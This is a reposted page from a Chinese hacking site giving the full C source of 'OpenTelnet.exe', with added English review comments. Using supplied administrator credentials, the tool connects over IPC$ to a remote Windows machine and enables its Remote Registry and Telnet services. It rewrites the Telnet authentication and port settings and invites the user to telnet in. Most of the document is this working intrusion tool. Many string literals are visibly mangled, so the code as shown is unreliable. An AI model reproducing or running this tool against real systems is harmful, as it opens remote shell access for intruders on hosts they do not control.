

opentelnet.exe 源代码

更新时间:2012-2-18 15:45:46   作者:华中帝国整理  来源:华中帝国

opentelnet.exe 源代码
——————————————————————————————
// OpenTelnet.exe \\\\server username password NTLMAuthtelnetport
#include <stdio.h>
#include <assert.h>
#include <windows.h>
#include <Winnetwk.h>
#include <Winreg.h>
#include <Shlwapi.h>

#pragma comment(lib, “Advapi32.lib”)
#pragma comment(lib, “Mpr.lib”)

// Process-wide state shared between main() and the service helpers below.
SC_HANDLE g_schSCManager;            // remote SCM handle opened in main(); used by RestartTelnet()/StartRemoteRegistry()
HKEY g_hKey;                         // remote HKEY_LOCAL_MACHINE obtained via RegConnectRegistry in main()
DWORD g_DefaultTelnetStartType;      // TlntSvr start type as found by RestartTelnet(); main() stores it as default_TelnetStart
DWORD g_DefaultRegistryStartType;    // RemoteRegistry start type as found by StartRemoteRegistry(); main() stores it as default_RegistryStart
LPBYTE g_lpDefaultTelnetNTLM;        // original NTLM value bytes (LocalAlloc'd in main(), never LocalFree'd)
LPBYTE g_lpDefaultTelnetPort;        // original TelnetPort value bytes (LocalAlloc'd in main(), never LocalFree'd)

// Forward declarations; the definitions follow main().
void Usage(char*);
int RestartTelnet();
int StartRemoteRegistry();
int MyStartService(SC_HANDLE, char*);


/*
 * Entry point.  Expected command line (see Usage()):
 *   OpenTelnet.exe \\server username password NTLMAuth telnetport
 *
 * Side effects on the target, in order: cancels and re-establishes an IPC$
 * session to argv[1] with the supplied credentials (WNetAddConnection2),
 * opens the remote SCM with SC_MANAGER_ALL_ACCESS, makes sure RemoteRegistry
 * is running (StartRemoteRegistry), writes the NTLM and TelnetPort values
 * under HKLM\SOFTWARE\Microsoft\TelnetServer\1.0, restarts TlntSvr
 * (RestartTelnet), and finally stores the previous settings as default_NTLM,
 * default_Port, default_TelnetStart and default_RegistryStart under the same
 * key.  Those four values, plus any service start-type change made by the
 * helpers, are the persistent artifacts this program leaves behind.
 *
 * Returns 0 on every path; failures are reported only via printf.
 *
 * NOTE(review): argc is compared against 5, but argv[5] is read below, so a
 * command line with exactly five argv entries passes the check and hands a
 * NULL pointer to atoi.  The check presumably should be `argc < 6`.
 */
int main(int argc, char* argv[])
{
int nRetCode;
char szIpc[50] = “”;
HKEY hKey;
LPSTR lpUserName, lpPassword;
NETRESOURCE NET;

DWORD dwNTLM, dwTelnetPort;

Usage(argv[0]);    // print the banner and usage text
if (argc < 5)
return 0;

// Build the "\\server\ipc$" share name.
// NOTE(review): sprintf is unbounded; an over-long argv[1] overflows the
// 50-byte stack buffer szIpc.
sprintf (szIpc, “%s\\\\ipc$”, argv[1]);
lpUserName = argv[2];   // user name
lpPassword = argv[3];   // password

NET.lpLocalName = NULL;
NET.lpRemoteName = szIpc;
NET.dwType = RESOURCETYPE_ANY;
NET.lpProvider = NULL;

printf (“Connecting %s”,argv[1]);

ReConnect:

// Drop any IPC connection that already exists to the target, so the
// connection below is made with the supplied credentials.
nRetCode = WNetCancelConnection2(szIpc, CONNECT_UPDATE_PROFILE, TRUE);
if (nRetCode == NO_ERROR)
printf (“Canncel Successfully!\”);

// Establish the IPC connection (authenticates to the target as lpUserName).
nRetCode = WNetAddConnection2(&NET, lpPassword, lpUserName, CONNECT_INTERACTIVE);
if (nRetCode == ERROR_ALREADY_ASSIGNED || nRetCode == ERROR_DEVICE_ALREADY_REMEMBERED)
{
printf (“Already conneted to the server!\”);
printf (“Now re-connecting the server\”);
// NOTE(review): there is no retry limit.  If the cancel above keeps failing
// while WNetAddConnection2 keeps reporting an existing connection, this
// loops indefinitely.
goto ReConnect;    // a connection already exists: cancel it and try again
}
else if (nRetCode == NO_ERROR)
printf (“Successfully!\”); // connected
else
{
printf (“\\\tErr:”);
switch (nRetCode)        // report why the connection failed
{
case ERROR_ALREADY_ASSIGNED:
// Not reachable here: ERROR_ALREADY_ASSIGNED is handled by the goto branch
// above.  Falls through to the ERROR_ACCESS_DENIED message.

case ERROR_ACCESS_DENIED:
   printf (“ERROR_ACCESS_DENIED\”);
   break;
case ERROR_BAD_NET_NAME:
   printf (“ERROR_BAD_NET_NAME\”);
   break;
default:
   printf (“CONNECT ERR:%d!\”,GetLastError());
   break;
}
return 0;
}

// Open the target's Service Control Manager with full access (this
// presumably needs administrative rights on the target).
g_schSCManager = OpenSCManager(argv[1], NULL, SC_MANAGER_ALL_ACCESS);
if (g_schSCManager == NULL)
{
printf (“Open SCManager failed!\”);
return 0;
}

// Make sure the RemoteRegistry service is running; this may also change its
// start type (see StartRemoteRegistry()).
if (!StartRemoteRegistry())
{
printf (“All Process Failed!\”);
return 0;
}

// Connect to the target's HKEY_LOCAL_MACHINE.
if (!(RegConnectRegistry((LPCTSTR) argv[1], HKEY_LOCAL_MACHINE, &g_hKey) == ERROR_SUCCESS))
{
printf (“Connect remote registry failed!\”);
return 0;
}

// Open the Telnet server configuration key.
if (!(RegOpenKeyEx(g_hKey, “SOFTWARE\\\\Microsoft\\\\TelnetServer\\\\1.0”, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS))
{
printf (“Open key failed!\”);
return 0;
}

// Read the current NTLM and TelnetPort values so they can be stored under
// default_NTLM / default_Port below for later restoration.
g_lpDefaultTelnetNTLM = (LPBYTE) LocalAlloc(LPTR, 50);   // 50-byte buffers; neither is ever LocalFree'd
g_lpDefaultTelnetPort = (LPBYTE) LocalAlloc(LPTR, 50);
DWORD dwDataSize = 50;
// Read NTLM (the original comment says its default is 2).
// NOTE(review): dwDataSize is an in/out parameter; after this call it holds
// the size the value actually had and is reused as-is for the next query.
if (!(RegQueryValueEx(hKey, “NTLM”, NULL, NULL, g_lpDefaultTelnetNTLM, &dwDataSize) == ERROR_SUCCESS))
{
printf (“Read NTLM failed!\ ”);
return 0;
}
// Read TelnetPort (the original comment says its default is 23).
if (!(RegQueryValueEx(hKey, “TelnetPort”, NULL, NULL, g_lpDefaultTelnetPort, &dwDataSize) == ERROR_SUCCESS))
{
printf (“Read port failed!\ ”);
return 0;
}

// Derive the new NTLM and port values from the command line.
// dwNTLM is a DWORD (unsigned): a non-numeric argv[4] becomes 0, a negative
// one wraps to a large value and is clamped to 1 by the check below.
dwNTLM = atoi(argv[4]);
if (dwNTLM >= 3)
{
dwNTLM = 1;
}
dwTelnetPort = atoi(argv[5]);   // see the argc note above; the port is not range-checked

// Write the NTLM value.
if (!(RegSetValueEx(hKey, “NTLM”, 0, REG_DWORD, (LPBYTE) &dwNTLM, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set NTLM value failed!”);
return 0;
}

// Write the TelnetPort value.
// NOTE(review): unlike the NTLM write, the return value is not checked.
RegSetValueEx(hKey, “TelnetPort”, 0, REG_DWORD, (LPBYTE) &dwTelnetPort, sizeof(DWORD));

// Restart the telnet service so the new values take effect.
nRetCode = RestartTelnet();

if (nRetCode)
{
printf (“\BINGLE!!!Yeah!!\”);
printf (“Telnet Port is %d. You can try:\\”telnet ip %d\\“, to connect the server!”, dwTelnetPort, dwTelnetPort);
}
// NOTE(review): when RestartTelnet() fails, execution still continues and the
// default_* values below are written anyway; g_DefaultTelnetStartType is then
// presumably whatever RestartTelnet() managed to record before failing.

// Store the previous settings under the same key so a companion tool
// ("resumetelnet" per the original comment) can restore them.  These four
// values are the most durable trace this program leaves on the target.
if (!(RegSetValueEx(hKey, “default_NTLM”, 0, REG_DWORD, g_lpDefaultTelnetNTLM, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultNTLM value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_Port”, 0, REG_DWORD, g_lpDefaultTelnetPort, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultPort value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_TelnetStart”, 0, REG_DWORD, (LPBYTE) &g_DefaultTelnetStartType, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaulttelnetstart value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_RegistryStart”, 0, REG_DWORD, (LPBYTE) &g_DefaultRegistryStartType, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultregistrystart value failed!”);
return 0;
}

RegCloseKey(hKey);
RegCloseKey(g_hKey);   // close both registry handles

// Close the SCM handle.
CloseServiceHandle(g_schSCManager);

// Tear down the IPC connection.
// NOTE(review): this cancels by argv[1], not by the szIpc name that was used
// when connecting — verify that the two refer to the same connection.
printf (“\Disconnecting server”);
nRetCode = WNetCancelConnection2(argv[1], CONNECT_UPDATE_PROFILE, TRUE);
if (nRetCode == NO_ERROR)
printf (“Successfully!\”);
else
printf (“Failed!\”);

return 0;
}

/*
 * Print the program banner and the expected command line.
 *
 * pcAppName: the program's own name (argv[0]); printed on its own line.
 * The remaining lines are fixed text, so they are written with fputs; only
 * the application-name line needs a format directive.
 */
void Usage(char* pcAppName)            // print the banner and usage text
{
fputs (“*******************************************************\”, stdout);
fputs (“Remote Telnet Configure, by samot\”, stdout);
fputs (“Email: samot@mail.org\”, stdout);
printf (“%s\\”, pcAppName);
fputs (“Usage:OpenTelnet.exe \\\\\\\\server username password NTLMAuthtelnetport\”, stdout);
fputs (“*******************************************************\”, stdout);
}

/*
 * Restart the TlntSvr service on the target (through g_schSCManager) so the
 * registry changes made by main() take effect.  Records the service's current
 * start type in g_DefaultTelnetStartType and, if the service was disabled,
 * switches it to SERVICE_DEMAND_START — a persistent configuration change on
 * the target that main() later stores as default_TelnetStart.
 *
 * Returns 1 on success, 0 on any failure (reported via printf).
 *
 * NOTE(review): every early return leaks schTelnetService and lpTelnetConfig,
 * and lpTelnetConfig is not LocalFree'd on the success path either.
 */
int RestartTelnet()                   // restart the telnet service
{
DWORD     dwWaitTime;
DWORD     dwConfigSize;
SC_HANDLE    schTelnetService;
SERVICE_STATUS   ssTelnetStatus;
LPQUERY_SERVICE_CONFIG lpTelnetConfig;

printf (“\NOTICE!!!!!!\”);
printf (“The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23\\”);

// Open the telnet service with full access.
schTelnetService = OpenService(g_schSCManager, “TlntSvr”, SERVICE_ALL_ACCESS);
if (schTelnetService == NULL)
{
printf (“Open service failed!\”);
return 0;
}

// 1024-byte buffer for the QUERY_SERVICE_CONFIG structure.
lpTelnetConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
if (lpTelnetConfig == NULL)
{
printf (“Alloc memory failed!\”);
return 0;
}

// Fetch the service's current configuration.
if (!QueryServiceConfig(schTelnetService, lpTelnetConfig, 1024, &dwConfigSize))
{
printf (“Query service congfig failed!\”);
return 0;
}

// Remember the original start type; main() writes it to default_TelnetStart.
g_DefaultTelnetStartType = lpTelnetConfig->dwStartType;

// A disabled service cannot be started, so switch it to demand start.
if (lpTelnetConfig->dwStartType == SERVICE_DISABLED)
{
if (!ChangeServiceConfig(schTelnetService,
        SERVICE_NO_CHANGE,
        SERVICE_DEMAND_START,
        SERVICE_NO_CHANGE,
        NULL, NULL, NULL, NULL, NULL, NULL, NULL))
{
   printf (“Change service config failed!\”);
   return 0;
}
}

// Query the service's current state.
if (!(QueryServiceStatus(schTelnetService, &ssTelnetStatus)))
{
printf (“Query service status failed!\”);
return 0;
}

// Stop the service unless it is already stopped or stopping.
if (ssTelnetStatus.dwCurrentState != SERVICE_STOPPED && ssTelnetStatus.dwCurrentState != SERVICE_STOP_PENDING)
{
printf (“Stopping telnet service \”);
if (!(ControlService(schTelnetService, SERVICE_CONTROL_STOP, &ssTelnetStatus)))
{
   printf (“Control telnet service status failed!\”);
   return 0;
}

// Wait for the stop: a single sleep of dwWaitHint/10, clamped to
// 1..10 seconds, followed by one re-query (no polling loop here, unlike
// MyStartService()).
dwWaitTime = ssTelnetStatus.dwWaitHint / 10;
if( dwWaitTime < 1000 )
   dwWaitTime = 1000;
else if ( dwWaitTime > 10000 )
   dwWaitTime = 10000;

Sleep(dwWaitTime);
if (!QueryServiceStatus(schTelnetService, &ssTelnetStatus))
{
   printf (“Query service status failed!\”);
}

// NOTE(review): if the re-query above failed, ssTelnetStatus still holds
// whatever ControlService wrote to it and is checked here as if it were
// fresh.
if ( ssTelnetStatus.dwCurrentState == SERVICE_STOPPED || ssTelnetStatus.dwCurrentState == SERVICE_STOP_PENDING)
{
   printf (“Telnet service is stopped successfully!\”);
}
else
{
   printf (“Stopping telnet service failed!\”);
   return 0;
}
}    // the telnet service is now stopped (or stop pending)

// Start the telnet service again.

if (!MyStartService(schTelnetService, “telnet”))
return 0;

CloseServiceHandle(schTelnetService);   // close the service handle
return 1;
}

/*
 * Ensure the RemoteRegistry service is running on the target so that
 * RegConnectRegistry in main() can succeed.  Records the service's current
 * start type in g_DefaultRegistryStartType (main() stores it as
 * default_RegistryStart) and, if the service was disabled, switches it to
 * SERVICE_DEMAND_START — a persistent configuration change on the target.
 *
 * Returns 1 on success, 0 on failure (reported via printf).
 *
 * NOTE(review): lpRegistryConfig is never LocalFree'd, and every early return
 * after OpenService leaks schRegistryService as well.
 */
int StartRemoteRegistry()          // start the remote registry service
{
SC_HANDLE schRegistryService;
SERVICE_STATUS ssRegistryStatus;
LPQUERY_SERVICE_CONFIG lpRegistryConfig;
DWORD dwConfigSize;

// 1024-byte buffer for the QUERY_SERVICE_CONFIG structure.
lpRegistryConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
if (lpRegistryConfig == NULL)
{
printf (“Alloc memory failed!\”);
return 0;
}

// Open the RemoteRegistry service with full access.
schRegistryService = OpenService( g_schSCManager, “RemoteRegistry”, SERVICE_ALL_ACCESS);
if (schRegistryService == NULL)
{
printf (“Open remote registry service failed!\”);
return 0;
}

// Fetch the service's current configuration.
if (!QueryServiceConfig(schRegistryService, lpRegistryConfig, 1024, &dwConfigSize))
{
printf (“Query registry service config failed!\”);
return 0;
}

// Remember the original start type; a disabled service cannot be started,
// so switch it to demand start in that case.
g_DefaultRegistryStartType = lpRegistryConfig->dwStartType;
if (g_DefaultRegistryStartType == SERVICE_DISABLED)
{
if (!ChangeServiceConfig(schRegistryService,
        SERVICE_NO_CHANGE,
        SERVICE_DEMAND_START,
        SERVICE_NO_CHANGE,
        NULL, NULL, NULL, NULL, NULL, NULL,NULL))
{
   printf (“Change registry service config failed!\”);
   return 0;
}
}

// Query the service's current state.
if (!QueryServiceStatus(schRegistryService, &ssRegistryStatus))
{
printf (“Query remote registry service failed!\”);
return 0;
}

// Start the service only if it is not already running.
if (ssRegistryStatus.dwCurrentState != SERVICE_RUNNING)
{
if (!MyStartService(schRegistryService, “remote registry”))
   return 0;
}
CloseServiceHandle(schRegistryService);
return 1;
}

/*
 * Start the service behind schService and wait until it leaves
 * SERVICE_START_PENDING.  szServiceName is used only in messages.
 *
 * Returns 1 if the service reports SERVICE_RUNNING afterwards, 0 otherwise.
 *
 * NOTE(review): ssStatus is declared without an initializer.  If the first
 * QueryServiceStatus fails, execution continues (the return is commented
 * out) and ssStatus.dwCheckPoint / dwCurrentState are read uninitialized.
 */
int MyStartService(SC_HANDLE schService, char* szServiceName)   // start the given service
{
DWORD dwWaitTime;
DWORD dwOldCheckPoint;
DWORD dwStartTickCount;
SERVICE_STATUS ssStatus;

// Ask the SCM to start the service.
printf (“Starting %s service\”, szServiceName);
if (!(StartService(schService, 0, NULL)))
{
printf (“Starting %s service failed!\”, szServiceName);
return 0;
}

// Fetch the initial status.
if (!(QueryServiceStatus(schService, &ssStatus)))
{
printf (“Query %s service status failed!\”,szServiceName);
// return ;
}

    dwStartTickCount = GetTickCount();    // time of the last observed progress
    dwOldCheckPoint = ssStatus.dwCheckPoint;

// Poll while the service is still starting.
while ( ssStatus.dwCurrentState == SERVICE_START_PENDING)
{
// Sleep for a tenth of the service's wait hint, clamped to 1..10 seconds.
dwWaitTime = ssStatus.dwWaitHint / 10;
        if( dwWaitTime < 1000 )
            dwWaitTime = 1000;
        else if ( dwWaitTime > 10000 )
            dwWaitTime = 10000;

Sleep(dwWaitTime);

        // Re-query the status; a failed query ends the wait.

        if (!QueryServiceStatus(schService, &ssStatus))
            break;

        if ( ssStatus.dwCheckPoint > dwOldCheckPoint )
        {
            // The service made progress: reset the timeout reference point.
            dwStartTickCount = GetTickCount();
            dwOldCheckPoint = ssStatus.dwCheckPoint;
        }
        else
        {
            if(GetTickCount()-dwStartTickCount > ssStatus.dwWaitHint)
            {
                // No progress within the service's own wait hint: give up.
                break;
            }
        }
}

if ( ssStatus.dwCurrentState == SERVICE_RUNNING )
{
printf (“%s service is started successfully! %s service is running!\”, szServiceName, szServiceName);
}
else
{
printf (“%s service is not started!\”, szServiceName);
return 0;
}

return 1;
}
